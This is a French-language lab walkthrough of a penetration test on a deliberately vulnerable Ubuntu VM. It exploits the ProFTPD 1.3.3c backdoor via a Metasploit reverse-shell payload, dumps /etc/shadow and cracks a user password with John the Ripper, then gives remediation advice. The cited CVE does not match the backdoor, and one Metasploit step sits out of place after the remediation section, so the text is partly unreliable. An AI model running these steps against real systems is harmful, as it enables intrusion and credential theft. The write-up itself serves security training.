
Walkthrough de test d'intrusion sur une VM Ubuntu vulnérable. Exploitation du backdoor ProFTPD 1.3.3c (CVE-2010-4221) pour obtenir un accès root et capturer le flag. Comprend l'énumération Nmap, la configuration du payload Metasploit et le craquage des hashs utilisateurs (John the Ripper).
Laboratoire de sécurité offensive : Exploit de la backdoor ProFTPD 1.3.3c (flag root)
Ce rapport détaille le test d'intrusion réalisé sur une machine virtuelle (VM) Linux vulnérable, en se concentrant sur l'identification d'une vulnérabilité de service à haut risque qui a permis un accès root immédiat.
| Détail | Valeur |
|---|---|
| Adresse IP cible | [ 192.168.222.130] |
| Adresse IP de l'attaquant (LHOST) | [ 192.168.222.128] |
| OS cible | Ubuntu 4ubuntu2.2 (Linux Kernel 3.x) |
| Objectif | Obtenir un shell root et récupérer le fichier flag. |
La reconnaissance initiale a consisté en un scan des services avec Nmap pour identifier les ports ouverts et les versions des services.
Commande :
sudo nmap -sS -sV 192.168.222.130
Résultats clés :
| Port | Service | Version | Risque | | :--- | :--- | :--- | :---
| 21/tcp | ftp | ProFTPD 1.3.3c | CRITIQUE (Backdoor exploitable) |
| 22/tcp | ssh | OpenSSH 7.2p2 | Faible (Service standard) |
| 80/tcp | http | Apache httpd 2.4.18 | Faible (Aucune vulnérabilité web évidente trouvée) |
Un scan ultérieur avec les scripts de détection de vulnérabilités a confirmé l'existence d'une backdoor hautement critique dans le service FTP.
La sortie du script Nmap montrait explicitement l'exécution de commandes en tant qu'utilisateur root :
| ftp-proftpd-backdoor:
| This installation has been backdoored.
| Command: id
|_ Results: uid=0(root) gid=0(root) groups=0(root)...
3. Exploitation et obtention d'un shell root
Le framework Metasploit a été utilisé pour exploiter la backdoor ProFTPD confirmée.
Étapes de l'exploit :
Lancer Metasploit : msfconsole
Sélectionner le module d'exploit : use exploit/unix/ftp/proftpd_133c_backdoor
Définir les options :
Bash
set RHOSTS 192.168.222.130
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.222.128
Résultat : une session shell de commande a été établie avec succès, accordant immédiatement les privilèges root (uid=0).
4. Post-exploitation et récupération du flag
Collecte d'identifiants
Les hashes des utilisateurs du système ont été extraits de /etc/shadow pour une analyse post-exploitation. Le hash de l'utilisateur marlinspike a été cassé avec succès à l'aide de John the Ripper.
Commande utilisée (sur la machine de l'attaquant) :
Bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Identifiants cassés :
Utilisateur : marlinspike
Mot de passe : marlinspike
5. Recommandations de remédiation
La posture de sécurité du système est extrêmement faible en raison du service FTP compromis. Des mesures immédiates doivent être prises pour sécuriser le système :
Correctif/mise à niveau immédiat(e) : le service ProFTPD doit être immédiatement corrigé ou mis à niveau vers une version sécurisée (supérieure à 1.3.3g) afin de corriger la backdoor connue et les CVE associées.
Suppression du service : si FTP n'est pas requis pour le fonctionnement du système, le service doit être complètement supprimé.
Pare-feu : mettre en place des règles de pare-feu strictes (iptables/ufw) pour bloquer l'accès externe au port 21.
Configurations SSH sécurisées : vérifier les configurations SSH pour désactiver la connexion root et imposer une authentification par clé.
Exécuter : exploit